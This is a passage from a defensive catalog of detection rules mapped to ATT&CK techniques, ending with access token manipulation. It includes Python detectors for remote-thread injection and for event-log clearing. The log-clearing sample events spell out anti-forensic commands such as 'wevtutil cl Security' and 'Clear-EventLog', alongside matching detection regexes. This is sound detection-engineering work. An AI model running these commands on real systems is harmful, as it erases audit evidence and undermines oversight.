- Splunk Suspicious Parent Process for spoolsv.exe (Sysmon)
- Splunk Suspicious Parent Process for spoolsv.exe (Windows Event Log)
- Elastic Suspicious Process Access via Direct System Call production
- Elastic Suspicious Process Creation CallTrace production
- Sigma Suspicious Rundll32 Invoking Inline VBScript test
- Splunk Suspicious SearchProtocolHost no Command Line Arguments production
- Sigma Suspicious Userinit Child Process test
- Elastic Suspicious Zoom Child Process production
- Sigma TAIDOOR RAT DLL Load test
- Splunk Trickbot Named Pipe production
- Sigma Uncommon Process Access Rights For Target Image test
- Sigma Uncommon Svchost Command Line Parameter experimental
- Splunk Unexpected Network Connection from System Process (Sysmon)
- Splunk Unexpected Network Connection from System Process (Windows Event Log)
- Elastic Unusual Child Process from a System Virtual Process production
- Elastic Unusual Parent-Child Relationship production
- Elastic Unusual Service Host Child Process - Childless Service production
- Splunk Unusual svchost Child Process (Sysmon)
- Splunk Unusual svchost Child Process (Windows Event Log)
- Splunk Windows List ENV Variables Via SET Command From Uncommon Parent production
- Splunk Windows Process Injection In Non-Service SearchIndexer production
- Splunk Windows Process Injection into Commonly Abused Processes production
- Splunk Windows Process Injection into Notepad production
- Splunk Windows Process Injection Of Wermgr to Known Browser production
- Splunk Windows Process Injection Remote Thread production
- Splunk Windows Process Injection Wermgr Child Process production
- Splunk Windows Process Injection With Public Source Path production
- Splunk Windows Process With NamedPipe CommandLine production
- Splunk Windows PUA Named Pipe production
- Splunk Windows Rasautou DLL Execution production
- Splunk Windows Remote Assistance Spawning Process production
- Splunk Windows RMM Named Pipe production
- Splunk Windows Suspicious C2 Named Pipe production
- Splunk Windows Suspicious Named Pipe production
- Splunk Winhlp32 Spawning a Process production
- Splunk Wscript Or Cscript Suspicious Child Process production
Process Injection: Dynamic-link Library Injection T1055.001 19 rules
- Sigma CreateRemoteThread API and LoadLibrary test
- Sigma HackTool - Potential CobaltStrike Process Injection test
- Splunk Loading Of Dynwrapx Module production
- Sigma ManageEngine Endpoint Central Dctask64.EXE Potential Abuse test
- Splunk Mavinject Execution (EDR)
- Splunk Mavinject Execution (Sysmon)
- Splunk Mavinject Execution (Windows Event Log)
- Sigma Mavinject Inject DLL Into Running Process test
- Splunk Potential CVE-2023-23397 (EDR)
- Splunk Potential CVE-2023-23397 (Sysmon)
- Splunk Potential CVE-2023-23397 (Windows Event Log)
- Sigma Potential DLL Injection Or Execution Using Tracker.exe test
- Splunk Powershell DLL_EXE Injection (PowerShell)
- Splunk PowerShell PInvoke Process Injection API Chain production
- Sigma Renamed Mavinject.EXE Execution test
- Sigma Renamed ZOHO Dctask64 Execution test
- Sigma TAIDOOR RAT DLL Load test
- Splunk Windows Process Injection Of Wermgr to Known Browser production
- Splunk Windows Rasautou DLL Execution production
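Several of the T1055 and T1055.001 rules above (Remote Thread Creation By Uncommon Source Image, Remote Thread Creation In Uncommon Target Image, Rare Remote Thread, CreateRemoteThread API and LoadLibrary) are all views of the same Sysmon EventID 8 record. The Python below, an added example and not any vendor's rule, triages constructed EventID 8 records the way those rules do: source-image allowlist, sensitive-target list, user-writable source path, a `LoadLibrary` start function (the classic DLL-injection signature) and a start address that lies in no loaded module (the shellcode case). The allowlists, reason tags and sample records are assumptions for the example; the field names (`SourceImage`, `TargetImage`, `StartModule`, `StartFunction`) are Sysmon's own.

```python
"""Added example for Process Injection (T1055 / T1055.001) over Sysmon
EventID 8 (CreateRemoteThread). Not a catalog rule; the allowlists are an
illustrative starting point and the sample events are constructed."""
import re

# Windows binaries that routinely create threads in other processes.
EXPECTED_SOURCES = {
    r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\winlogon.exe", r"c:\windows\system32\services.exe",
    r"c:\windows\system32\svchost.exe", r"c:\windows\system32\lsass.exe",
    r"c:\windows\system32\wbem\wmiprvse.exe", r"c:\windows\system32\msiexec.exe",
}
# Targets attackers pick to blend in or to reach credentials.
SENSITIVE_TARGETS = {
    r"c:\windows\system32\lsass.exe", r"c:\windows\explorer.exe",
    r"c:\windows\system32\svchost.exe", r"c:\windows\system32\notepad.exe",
    r"c:\windows\system32\werfault.exe",
}
USER_WRITABLE = re.compile(r"^c:\\(users\\|programdata\\|windows\\temp\\)", re.I)

# Constructed Sysmon EventID 8 records, fields trimmed.
SAMPLE_EVENTS = [
    # console control routine injected by csrss: routine and benign
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "StartModule": r"C:\Windows\System32\KERNEL32.DLL", "StartFunction": "CtrlRoutine"},
    # dropper in Temp loads a DLL into explorer.exe
    {"EventID": 8, "SourceImage": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "TargetImage": r"C:\Windows\explorer.exe",
     "StartModule": r"C:\Windows\System32\KERNEL32.DLL", "StartFunction": "LoadLibraryW"},
    # rundll32 starting a thread at an address inside no module: shellcode
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\rundll32.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe",
     "StartModule": "-", "StartFunction": "-"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\winlogon.exe",
     "TargetImage": r"C:\Windows\System32\dwm.exe",
     "StartModule": r"C:\Windows\System32\ntdll.dll", "StartFunction": "RtlUserThreadStart"},
]


def triage(ev):
    """Return the list of reasons a CreateRemoteThread record is suspicious ([] = benign)."""
    if ev.get("EventID") != 8:
        return []
    src, tgt = ev["SourceImage"].lower(), ev["TargetImage"].lower()
    if src == tgt:
        return []  # threads in one's own process are not injection
    reasons = []
    if src not in EXPECTED_SOURCES:
        reasons.append("uncommon_source_image")
    if tgt in SENSITIVE_TARGETS:
        reasons.append("sensitive_target_image")
    if USER_WRITABLE.match(src):
        reasons.append("source_in_user_writable_path")
    if "loadlibrary" in ev.get("StartFunction", "").lower():
        reasons.append("loadlibrary_start_function")  # DLL injection via LoadLibrary
    if ev.get("StartModule", "") in ("", "-") and src not in EXPECTED_SOURCES:
        reasons.append("start_address_outside_any_module")  # shellcode-style thread start
    return reasons


def detect(events):
    """(source, target, reasons) for every record triage does not clear."""
    hits = []
    for ev in events:
        reasons = triage(ev)
        if reasons:
            hits.append((ev["SourceImage"], ev["TargetImage"], reasons))
    return hits


if __name__ == "__main__":
    for src, tgt, why in detect(SAMPLE_EVENTS):
        print(f"{src} -> {tgt}: {', '.join(why)}")
```

Two tuning notes from running this on real telemetry: the source allowlist is the knob that controls volume (EDR agents, debuggers and some AV engines belong on it per environment), and the `StartModule == "-"` condition is the highest-signal predicate, since benign cross-process threads almost always start inside kernel32 or ntdll.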
Process Injection: Portable Executable Injection T1055.002 6 rules
- Kusto ADWS Connection from Process Injection Target
- Kusto Process Injection From Untrusted Process
- Splunk Windows Process Injection into Commonly Abused Processes production
- Splunk Windows Process Injection into Notepad production
- Splunk Windows Process Injection Remote Thread production
- Splunk Windows Process Injection With Public Source Path production
Process Injection: Thread Execution Hijacking T1055.003 3 rules
- Sigma HackTool - LittleCorporal Generated Maldoc Injection test
- Splunk PowerShell PInvoke Process Injection API Chain production
- Sigma Remote Thread Creation In Uncommon Target Image test
Process Injection: Asynchronous Procedure Call T1055.004 1 rule
- Splunk PowerShell PInvoke Process Injection API Chain production
Process Injection: Process Hollowing T1055.012 10 rules
- Sigma HackTool - CACTUSTORCH Remote Thread Creation test
- Sigma HackTool - HollowReaper Execution experimental
- Sigma Potential Pikabot Hollowing Activity test
- Sigma Potential Process Hollowing Activity test
- Splunk PowerShell PInvoke Process Injection API Chain production
- Elastic Suspicious Endpoint Security Parent Process production
- Elastic Suspicious Process Creation CallTrace production
- Sigma Uncommon Svchost Command Line Parameter experimental
- Elastic Unusual Parent-Child Relationship production
- Elastic Unusual Service Host Child Process - Childless Service production
Process Injection: Process Doppelgänging T1055.013 1 rule
- Splunk PowerShell PInvoke Process Injection API Chain production
Indicator Removal T1070 87 rules
- Sigma ADS Zone.Identifier Deleted test
- Sigma ADS Zone.Identifier Deleted By Uncommon Application test
- Sigma Backup Catalog Deleted test
- Sigma Clear PowerShell History - PowerShell test
- Sigma Clear PowerShell History - PowerShell Module test
- Splunk Clear Unallocated Sector Using Cipher App production
- Splunk Clear Windows Event Logs (Windows Event Log)
- Kusto Clearing of forensic evidence from event logs using wevtutil available
- Sigma Clearing Windows Console History test
- Elastic Clearing Windows Console History production
- Elastic Clearing Windows Event Logs production
- Splunk Create or delete windows shares using net exe production
- Elastic Delete Volume USN Journal with Fsutil production
- Sigma Directory Removal Via Rmdir test
- Sigma Disable Administrative Share Creation at Startup test
- Sigma Disable of ETW Trace - Powershell test
- Sigma Disable Powershell Command History test
- Elastic Disable Windows Event and Security Logs Using Built-in Tools production
- Sigma DLL Load By System Process From Suspicious Locations test
- Sigma ETW Trace Evasion Activity test
- Splunk ETW Trace Provider Modified - PowerShell (PowerShell)
- Sigma Event log clear attempt (command) experimental
- Sigma Event log clear attempt (PowerShell) experimental
- Sigma Event log clear attempt (wmi) experimental
- Sigma Event log cleared (native) experimental
- Sigma Event log cleared using Diagnostics (via PowerShell) stable
- Sigma EventLog EVTX File Deleted test
- Sigma Exchange PowerShell Cmdlet History Deleted test
- Sigma File Creation Date Changed to Another Year test
- Sigma File Deleted Via Sysinternals SDelete test
- Sigma File Deletion Via Del test
- Elastic File or Directory Deletion Command production
- Sigma Filter Driver Unloaded Via Fltmc.EXE test
- Sigma Fsutil Suspicious Invocation stable
- Splunk Fsutil Zeroing File production
- Sigma Greedy File Deletion Using Del test
- Sigma IIS WebServer Access Logs Deleted test
- Sigma IIS WebServer Log Deletion via CommandLine Utilities experimental
- Sigma MaxMpxCt Registry Value Changed test
- Splunk Network Share Connection Removal (PowerShell)
- Splunk NirCmd Execution (Sysmon)
- Splunk NirCmd Execution (Windows Event Log)
- Kusto NRT Security Event log cleared available
- Sigma Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE test
- Elastic Potential REMCOS Trojan Execution production
- Sigma Potential Secure Deletion with SDelete test
- Elastic Potential Timestomp in Executable Files production
- Sigma Potentially Suspicious Ping/Copy Command Combination test
- Sigma PowerShell Console History Logs Deleted test
- Sigma PowerShell Deleted Mounted Share test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Powershell Timestomp test
- Sigma Prefetch File Deleted test
- Splunk Process Deleting Its Process File Path production
- Kusto Qakbot Campaign Self Deletion available
- Splunk Recursive Delete of Directory In Batch CMD production
- Sigma RunMRU Registry Key Deletion experimental
- Sigma RunMRU Registry Key Deletion - Registry experimental
- Splunk Sdelete Application Execution production
- Kusto Security Event log cleared available
- Elastic Sensitive Audit Policy Sub-Category Disabled production
- Sigma Shadow Copies Deletion Using Operating Systems Utilities stable
- Sigma Suspicious IO.FileStream test
- Sigma Suspicious Ping/Del Command Combination test
- Elastic Suspicious Print Spooler File Deletion production
- Sigma Sysmon Driver Unloaded Via Fltmc.EXE test
- Sigma System time changed experimental
- Sigma System time changed (PowerShell) experimental
- Sigma TeamViewer Log File Deleted test
- Sigma Terminal Server Client Connection History Cleared - Registry test
- Splunk Timestamp Manipulation (PowerShell)
- Splunk Timestamp Manipulation (Windows Event Log)
- Sigma Tomcat WebServer Logs Deleted test
- Sigma Unauthorized System Time Modification test
- Sigma Unmount Share Via Net.EXE test
- Sigma Use Of Remove-Item to Delete File - ScriptBlock test
- Splunk USN Journal Deletion production
- Splunk Windows ConsoleHost History File Deletion production
- Splunk Windows Default Rdp File Deletion production
- YARA-L Windows Event Log Cleared
- Elastic Windows Event Logs Cleared production
- Splunk Windows Indicator Removal Via Rmdir production
- Sigma Windows Mail App Mailbox Access Via PowerShell Script test
- Splunk Windows Powershell History File Deletion production
- Splunk Windows Rdp AutomaticDestinations Deletion production
- Splunk Windows RDP Cache File Deletion production
- Splunk Windows RDP Server Registry Deletion production
Indicator Removal: Clear Windows Event Logs T1070.001 11 rules
- Splunk Clear Windows Event Logs (Windows Event Log)
- Elastic Clearing Windows Event Logs production
- Elastic Disable Windows Event and Security Logs Using Built-in Tools production
- Sigma Event log clear attempt (command) experimental
- Sigma Event log clear attempt (PowerShell) experimental
- Sigma Event log clear attempt (wmi) experimental
- Sigma Event log cleared (native) experimental
- Sigma Event log cleared using Diagnostics (via PowerShell) stable
- Elastic Sensitive Audit Policy Sub-Category Disabled production
- YARA-L Windows Event Log Cleared
- Elastic Windows Event Logs Cleared production
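To make concrete what separates the "clear attempt" rules (command, PowerShell, WMI) from the "cleared (native)" rules in the T1070.001 list above, here is an added Python example, not code from any of the listed vendors, that applies both kinds of predicate to constructed Windows events. Event ID 1102 in the Security log and Event ID 104 (provider Microsoft-Windows-Eventlog) in the System log are the Event Log service's own records of a cleared log; the rule tags, the trimmed field names and the sample records are assumptions for the example.

```python
"""Added example for Indicator Removal: Clear Windows Event Logs (T1070.001).
Not a vendor rule. Sample records are constructed; field names follow the
Security, Sysmon and PowerShell ScriptBlock events they imitate."""
import re

# Attempt-side predicates: what the tooling looks like on a command line or
# in a script block. Tags are hypothetical labels for this example.
ATTEMPT_PATTERNS = [
    ("clear_attempt_command",
     re.compile(r"\bwevtutil(\.exe)?\b.*\b(cl|clear-log)\b", re.I)),
    ("clear_attempt_powershell",
     re.compile(r"\b(Clear|Remove)-EventLog\b|EventLogSession\]::GlobalSession\.ClearLog\(", re.I)),
    ("clear_attempt_wmi",
     re.compile(r"Win32_NTEventlogFile\b.*\.(ClearEventLog|BackupEventLog)\(", re.I | re.S)),
]

SAMPLE_EVENTS = [
    # benign: reading the log, not clearing it
    {"Channel": "Security", "EventID": 4688, "SubjectUserName": "helpdesk",
     "CommandLine": "wevtutil.exe qe Security /c:5 /f:text"},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1, "User": r"CORP\svc_backup",
     "CommandLine": r'"C:\Windows\System32\wevtutil.exe" cl Security'},
    {"Channel": "Microsoft-Windows-PowerShell/Operational", "EventID": 4104,
     "ScriptBlockText": "Clear-EventLog -LogName Security, System, Application"},
    {"Channel": "Microsoft-Windows-PowerShell/Operational", "EventID": 4104,
     "ScriptBlockText": "Get-WmiObject -Class Win32_NTEventlogFile | ForEach-Object { $_.ClearEventLog() }"},
    # native: written by the Event Log service itself once the clear succeeded
    {"Channel": "Security", "EventID": 1102, "Provider": "Microsoft-Windows-Eventlog",
     "SubjectUserName": "svc_backup"},
    {"Channel": "System", "EventID": 104, "Provider": "Microsoft-Windows-Eventlog",
     "ClearedChannel": "System", "SubjectUserName": "svc_backup"},
]


def detect(events):
    """Return (tag, detail) pairs, one per matching event."""
    alerts = []
    for ev in events:
        eid, ch = ev.get("EventID"), ev.get("Channel", "")
        # Native confirmations first: these are the authoritative signal and are
        # the first record in the freshly cleared log, so they survive the clear.
        if ch == "Security" and eid == 1102:
            alerts.append(("cleared_native",
                           f"Security log cleared by {ev.get('SubjectUserName')}"))
            continue
        if ch == "System" and eid == 104 and ev.get("Provider") == "Microsoft-Windows-Eventlog":
            alerts.append(("cleared_native",
                           f"{ev.get('ClearedChannel')} log cleared by {ev.get('SubjectUserName')}"))
            continue
        # Attempt-side: name the tool even when the clear itself failed.
        text = ev.get("CommandLine") or ev.get("ScriptBlockText") or ""
        for tag, rx in ATTEMPT_PATTERNS:
            if rx.search(text):
                alerts.append((tag, text.strip()))
                break  # one tag per event
    return alerts


if __name__ == "__main__":
    for tag, detail in detect(SAMPLE_EVENTS):
        print(f"{tag}: {detail}")
```

Keep both halves in production: the native events tell you a clear actually happened and who did it, while the attempt rules catch the cases where the caller lacked the privilege or the log was protected, and they preserve the command line that the cleared log no longer holds.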
Indicator Removal: Clear Command History T1070.003 10 rules
- Sigma Clear PowerShell History - PowerShell test
- Sigma Clear PowerShell History - PowerShell Module test
- Sigma Clearing Windows Console History test
- Elastic Clearing Windows Console History production
- Sigma Disable Powershell Command History test
- Sigma RunMRU Registry Key Deletion experimental
- Sigma RunMRU Registry Key Deletion - Registry experimental
- Sigma Suspicious IO.FileStream test
- Splunk Windows ConsoleHost History File Deletion production
- Splunk Windows Powershell History File Deletion production
Indicator Removal: File Deletion T1070.004 24 rules
- Sigma ADS Zone.Identifier Deleted test
- Sigma ADS Zone.Identifier Deleted By Uncommon Application test
- Sigma Backup Catalog Deleted test
- Splunk Clear Unallocated Sector Using Cipher App production
- Elastic Delete Volume USN Journal with Fsutil production
- Sigma Directory Removal Via Rmdir test
- Sigma File Deleted Via Sysinternals SDelete test
- Sigma File Deletion Via Del test
- Elastic File or Directory Deletion Command production
- Sigma Greedy File Deletion Using Del test
- Elastic Potential REMCOS Trojan Execution production
- Sigma Potential Secure Deletion with SDelete test
- Sigma Potentially Suspicious Ping/Copy Command Combination test
- Sigma Prefetch File Deleted test
- Splunk Recursive Delete of Directory In Batch CMD production
- Splunk Sdelete Application Execution production
- Sigma Suspicious Ping/Del Command Combination test
- Elastic Suspicious Print Spooler File Deletion production
- Sigma TeamViewer Log File Deleted test
- Sigma Use Of Remove-Item to Delete File - ScriptBlock test
- Splunk Windows Default Rdp File Deletion production
- Splunk Windows Rdp AutomaticDestinations Deletion production
- Splunk Windows RDP Cache File Deletion production
- Splunk Windows RDP Server Registry Deletion production
Indicator Removal: Network Share Connection Removal T1070.005 6 rules
- Splunk Create or delete windows shares using net exe production
- Sigma Disable Administrative Share Creation at Startup test
- Sigma MaxMpxCt Registry Value Changed test
- Splunk Network Share Connection Removal (PowerShell)
- Sigma PowerShell Deleted Mounted Share test
- Sigma Unmount Share Via Net.EXE test
Indicator Removal: Timestomp T1070.006 9 rules
- Sigma File Creation Date Changed to Another Year test
- Elastic Potential Timestomp in Executable Files production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Powershell Timestomp test
- Sigma System time changed experimental
- Sigma System time changed (PowerShell) experimental
- Splunk Timestamp Manipulation (PowerShell)
- Splunk Timestamp Manipulation (Windows Event Log)
- Sigma Unauthorized System Time Modification test
Valid Accounts T1078 67 rules
- Elastic Access to a Sensitive LDAP Attribute production
- Kusto Account added and removed from privileged groups
- Elastic Account Discovery Command via SYSTEM Account production
- Sigma Account renamed to admin (or likely) account to evade defense experimental
- Splunk Account set to active via Net.exe (EDR)
- Splunk Account set to active via Net.exe (Sysmon)
- Splunk Account set to active via Net.exe (Windows Event Log)
- Sigma Account Tampering - Suspicious Failed Logon Reasons test
- Sigma Admin User Remote Logon test
- Elastic AdminSDHolder Backdoor production
- Kusto AdminSDHolder Modifications
- Elastic AdminSDHolder SDProp Exclusion Added production
- Sigma Azure Windows virtual machine login via serial console experimental
- Sigma Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788) experimental
- Elastic Delegated Managed Service Account Modification by an Unusual User production
- Elastic dMSA Account Creation by an Unusual User production
- Sigma DMSA Link Attributes Modified experimental
- Sigma DMSA Service Account Created in Specific OUs - PowerShell experimental
- Kusto EatonForeseer - Unauthorized Logins available
- Kusto Email access via active sync
- Sigma External Remote RDP Logon from Public IP test
- Sigma External Remote SMB Logon from Public IP test
- Sigma Failed Logon From Public IP test
- Elastic First Time Seen Account Performing DCSync production
- Kusto Group created then added to built in domain local or global group
- Elastic Kerberos Pre-authentication Disabled for User production
- Sigma Lateral movement detection (based on "special groups" feature) experimental
- Elastic Mounting Hidden or WebDav Remote Shares production
- Splunk Multiple Host logons (Windows Event Log)
- Kusto Multiple Password Reset by user
- Sigma Network login performed to multiple targets experimental
- Sigma New DMSA Service Account Created in Specific OUs experimental
- Kusto New user created and added to the built-in administrators group
- Sigma Password Provided In Command Line Of Net.EXE test
- Elastic Potential Account Takeover - Logon from New Source IP production
- Elastic Potential Account Takeover - Mixed Logon Types production
- Elastic Potential Credential Access via DCSync production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Elastic Remote Computer Account DnsHostName Update production
- Splunk Rubeus Password Change (Windows Event Log)
- Splunk Short Lived Windows Accounts production
- Kusto Sign-ins from IPs that attempt sign-ins to disabled accounts (Uses Authentication Normalization)
- Sigma Success login attempt on a Windows OpenSSH server experimental
- Splunk Suspicious Computer Account Name Change production
- Sigma Suspicious Computer Machine Password by PowerShell test
- Splunk Suspicious Kerberos Service Ticket Request production
- Sigma Suspicious Remote Logon with Explicit Credentials test
- Splunk Suspicious Ticket Granting Ticket Request production
- Splunk Unusual Number of Computer Service Tickets Requested experimental
- Splunk Unusual Number of Remote Endpoint Authentication Events experimental
- Kusto User account added to built in domain local or global group
- Kusto User account created and deleted within 10 mins
- Kusto User account enabled and disabled within 10 mins
- Sigma User Added to Local Administrator Group stable
- Kusto User login from different countries within 3 hours (Uses Authentication Normalization)
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
- Splunk Windows ConvertTo-AADIntBackdoor Execution Via PowerShell Script production
- Splunk Windows Entra User Management Via Azure CLI production
- Splunk Windows Group Policy Object Created production
- Splunk Windows Guest Account Enabled Via Net.EXE production
- Splunk Windows Large Number of Computer Service Tickets Requested production
- Splunk Windows Multiple Account Passwords Changed production
- Splunk Windows Multiple Accounts Deleted production
- Splunk Windows Multiple Accounts Disabled production
- Splunk Windows PowerView AD Access Control List Enumeration production
- Splunk WMIC Explicit Credentials (Sysmon)
- Splunk WMIC Explicit Credentials (Windows Event Log)
Valid Accounts: Default Accounts T1078.001 6 rules
- Splunk Account set to active via Net.exe (EDR)
- Splunk Account set to active via Net.exe (Sysmon)
- Splunk Account set to active via Net.exe (Windows Event Log)
- Sigma Admin User Remote Logon test
- Sigma Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788) experimental
- Splunk Windows Guest Account Enabled Via Net.EXE production
Valid Accounts: Domain Accounts T1078.002 20 rules
- Elastic Access to a Sensitive LDAP Attribute production
- Sigma Account renamed to admin (or likely) account to evade defense experimental
- Sigma Admin User Remote Logon test
- Elastic AdminSDHolder Backdoor production
- Elastic AdminSDHolder SDProp Exclusion Added production
- Elastic Delegated Managed Service Account Modification by an Unusual User production
- Elastic dMSA Account Creation by an Unusual User production
- Sigma DMSA Link Attributes Modified experimental
- Sigma DMSA Service Account Created in Specific OUs - PowerShell experimental
- Elastic First Time Seen Account Performing DCSync production
- Elastic Kerberos Pre-authentication Disabled for User production
- Sigma New DMSA Service Account Created in Specific OUs experimental
- Elastic Potential Credential Access via DCSync production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Elastic Remote Computer Account DnsHostName Update production
- Splunk Suspicious Computer Account Name Change production
- Splunk Suspicious Kerberos Service Ticket Request production
- Splunk Suspicious Ticket Granting Ticket Request production
- Splunk Windows Group Policy Object Created production
- Splunk Windows PowerView AD Access Control List Enumeration production
Valid Accounts: Local Accounts T1078.003 4 rules
- Elastic Account Discovery Command via SYSTEM Account production
- Sigma Admin User Remote Logon test
- Elastic Mounting Hidden or WebDav Remote Shares production
- Splunk Short Lived Windows Accounts production
Valid Accounts: Cloud Accounts T1078.004 1 rule
- Splunk Windows Entra User Management Via Azure CLI production
Trusted Developer Utilities Proxy Execution T1127 54 rules
- Sigma AspNetCompiler Execution test
- Sigma C# IL Code Compilation Via Ilasm.EXE test
- Splunk CDB Execution (Sysmon)
- Splunk CDB Execution (Windows Event Log)
- Elastic Delayed Execution via Ping production
- Sigma Detection of PowerShell Execution via Sqlps.exe test
- Splunk ETW Registry Disabled production
- Elastic Execution of Persistent Suspicious Program production
- Elastic Execution via Microsoft DotNet ClickOnce Host production
- Elastic Execution via MS VisualStudio Pre/Post Build Events production
- Sigma JScript Compiler Execution test
- Sigma Kavremover Dropped Binary LOLBIN Usage test
- Elastic Microsoft Build Engine Started by a System Process production
- Elastic Microsoft Build Engine Started by an Office Application production
- Splunk Microsoft Build Engine Suspicious Parent Process (Sysmon)
- Splunk Microsoft Build Engine Suspicious Parent Process (Windows Event Log)
- Elastic Microsoft Build Engine Using an Alternate Name production
- Sigma Microsoft Workflow Compiler Execution test
- Elastic MsBuild Making Network Connections production
- Splunk MSBuild Suspicious Spawned By Script Process production
- Elastic Network Activity to a Suspicious Top Level Domain production
- Sigma Node Process Executions test
- Sigma Potential Arbitrary Code Execution Via Node.EXE test
- Sigma Potential Binary Proxy Execution Via Cdb.EXE test
- Elastic Potential Credential Access via Trusted Developer Utility production
- Sigma Potential Mftrace.EXE Abuse test
- Sigma Potentially Suspicious ASP.NET Compilation Via AspNetCompiler test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Process Injection by the Microsoft Build Engine production
- Splunk Proxy Execution via Appcert (PowerShell)
- Splunk Proxy Execution via Appcert (Sysmon)
- Splunk Proxy Execution via Appcert (Windows Event Log)
- Sigma Remote Thread Creation Ttdinject.exe Proxy test
- Sigma Silenttrinity Stager Msbuild Activity test
- Sigma SQL Client Tools PowerShell Session Detection test
- Elastic Suspicious .NET Code Compilation production
- Sigma Suspicious Child Process of AspNetCompiler test
- Elastic Suspicious Execution from a Mounted Device production
- Sigma Suspicious File Created by ArcSOC.exe experimental
- Splunk Suspicious microsoft workflow compiler rename production
- Splunk Suspicious microsoft workflow compiler usage production
- Splunk Suspicious msbuild path production
- Splunk Suspicious MSBuild Rename production
- Splunk Suspicious MSBuild Spawn production
- Sigma Suspicious Use of CSharp Interactive Console test
- Kusto Trusted Developer Utilities Proxy Execution available
- Splunk Unusual AppCert Child Process (Sysmon)
- Splunk Unusual AppCert Child Process (Windows Event Log)
- Elastic Unusual Network Activity from a Windows System Binary production
- Elastic Unusual Process Network Connection production
- Sigma Use of Remote.exe test
- Sigma Use of TTDInject.exe test
- Sigma Use of VSIISExeLauncher.exe test
- Sigma Use of Wfc.exe test
Trusted Developer Utilities Proxy Execution: MSBuild T1127.001 20 rules
- Elastic Delayed Execution via Ping production
- Elastic Execution of Persistent Suspicious Program production
- Elastic Execution via MS VisualStudio Pre/Post Build Events production
- Elastic Microsoft Build Engine Started by a System Process production
- Elastic Microsoft Build Engine Started by an Office Application production
- Splunk Microsoft Build Engine Suspicious Parent Process (Sysmon)
- Splunk Microsoft Build Engine Suspicious Parent Process (Windows Event Log)
- Elastic Microsoft Build Engine Using an Alternate Name production
- Elastic MsBuild Making Network Connections production
- Splunk MSBuild Suspicious Spawned By Script Process production
- Elastic Network Activity to a Suspicious Top Level Domain production
- Elastic Potential Credential Access via Trusted Developer Utility production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Process Injection by the Microsoft Build Engine production
- Sigma Silenttrinity Stager Msbuild Activity test
- Elastic Suspicious Execution from a Mounted Device production
- Splunk Suspicious msbuild path production
- Splunk Suspicious MSBuild Rename production
- Splunk Suspicious MSBuild Spawn production
- Elastic Unusual Network Activity from a Windows System Binary production
Trusted Developer Utilities Proxy Execution: ClickOnce T1127.002 1 rule
- Elastic Execution via Microsoft DotNet ClickOnce Host production
Access Token Manipulation T1134 49 rules
- Kusto Access Token Manipulation - Create Process with Token available
- Sigma Addition of SID History to Active Directory Object stable
- Sigma Anonymous login (RottenPotatoNG) experimental
- Sigma HackTool - Impersonate Execution test
- Sigma HackTool - Koh Default Named Pipe test
- Sigma HackTool - NoFilter Execution test
- Sigma HackTool - PPID Spoofing SelectMyParent Tool Execution test
- Sigma HackTool - SharpDPAPI Execution test
- Sigma HackTool - SharpImpersonation Execution test
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - Security test
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - System test
- Sigma New rights granted to an account for privilege escalation experimental
- Elastic Parent Process PID Spoofing production
- Kusto Possible Resource-Based Constrained Delegation Abuse
- Sigma Potential Access Token Abuse test
- Sigma Potential Meterpreter/CobaltStrike Activity test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Privilege Escalation via Named Pipe Impersonation production
- Elastic Privilege Escalation via Rogue Named Pipe Impersonation production
- Sigma Privilege escalation via runas (command) experimental
- Sigma Privilege escalation via RunasCS experimental
- Elastic Privileges Elevation via Parent Process PID Spoofing production
- Elastic Process Created with a Duplicated Token production
- Elastic Process Created with an Elevated Token production
- Elastic Process Creation via Secondary Logon production
- Kusto PRT Credential Stealing
- Sigma PUA - AdvancedRun Execution test
- Sigma PUA - AdvancedRun Suspicious Execution test
- Sigma RedSun - Conhost.exe Spawned by TieringEngineService.exe experimental
- Splunk Runas Execution in CommandLine production
- Elastic SeDebugPrivilege Enabled by a Suspicious Process production
- Kusto Service Principal Name (SPN) Assigned to User Account
- Sigma Suspicious Child Process Created as System test
- Elastic Suspicious SeIncreaseBasePriorityPrivilege Use production
- Sigma Suspicious SYSTEM User Process Creation test
- Elastic Unusual Parent-Child Relationship production
- Splunk Windows Access Token Manipulation SeDebugPrivilege production
- Splunk Windows Access Token Manipulation Winlogon Duplicate Token Handle production
- Splunk Windows Access Token Winlogon Duplicate Handle In Uncommon Path production
- Splunk Windows AD Cross Domain SID History Addition production
- Splunk Windows AD Privileged Account SID History Addition production
- Splunk Windows AD Same Domain SID History Addition production
- Splunk Windows AD SID History Attribute Modified production
- Splunk Windows Handle Duplication in Known UAC-Bypass Binaries production
- Splunk Windows Parent PID Spoofing with Explorer production
- Splunk Windows Privilege Escalation Suspicious Process Elevation production
- Splunk Windows Privilege Escalation System Process Without System Parent production
- Splunk Windows Privilege Escalation User Process Spawn System Process production
- Splunk Wscript Or Cscript Suspicious Child Process production
Access Token Manipulation: Token Impersonation/Theft T1134.001 18 rules
- Sigma Anonymous login (RottenPotatoNG) experimental
- Sigma HackTool - Impersonate Execution test
- Sigma HackTool - Koh Default Named Pipe test
- Sigma HackTool - NoFilter Execution test
- Sigma HackTool - SharpDPAPI Execution test
- Sigma HackTool - SharpImpersonation Execution test
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - Security test
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - System test
- Sigma Potential Access Token Abuse test
- Sigma Potential Meterpreter/CobaltStrike Activity test
